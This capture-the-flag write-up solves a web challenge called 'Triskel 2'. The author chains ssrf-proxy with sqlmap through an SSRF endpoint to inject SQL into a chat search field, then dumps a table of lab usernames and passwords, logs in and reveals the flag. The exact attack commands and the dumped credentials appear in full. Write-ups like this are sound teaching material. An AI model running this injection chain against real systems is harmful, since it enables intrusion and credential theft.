Triskel 2 : Going in
Category: Airport hall/web
20 points
What did you do? You shouldn’t have access to this chat, but you can’t do anything from it right?
by Remsio
Solution
The continuation from the moment, when I ended Triskel 1 challenge.
There was one interesting thing in source of chat page - search option (French chercher
).
Few attempts to SQLi
gave me 400 Bad Request
which reassured me that I’m on the right track.
I’ve decided to automate the process, my choice was to use combination of ssrf_proxy
with sqlmap
. Note, that it was
my first approach to these tools.
Launched ssrf_proxy
as below. I’ve set --rules=noproto
to remove the http://
prefix from uri injection string.
ssrf-proxy -u http://10.45.4.38:8100/api/call_api.php?api=xxURLxx --rules=noproto
Then, I’ve used sqlmap
as below.
export ALL_PROXY=http://127.0.0.1:8081
sqlmap -u http://10.0.42.200/?search=% --dump
The interesting part from the output was user_news
table.
Database: db
Table: user_news
[6 entries]
+----+----------------------------+----------------------+
| id | password | username |
+----+----------------------------+----------------------+
| 1 | D.!uTra+b+wrUVH5s?^AE3a~X | admin_richard_lauren |
| 2 | X^UY6M=ohMA_ek3g{}Pm:mw:&A | admin_denis_valette |
| 3 | 69PCrHE287Tavvg | dev_arienne_dupuy |
| 4 | JC44n24D6ejGKym | dev_leroy_bedart |
| 5 | FwX6Pk29x2uAz7S | dev_pomeroy_dagenais |
| 6 | ypGk2ZtM7QRt343 | dev_denis_tetrault |
+----+----------------------------+----------------------+
I’ve tried to login with dev_leroy_bedart
credentials on http://10.45.4.38:8100/
website and found the flag on
Admin
subpage.
Flag
NORZH{Hidden_C0r0n4_ch4t_y0u_are_the_admin_now!:)}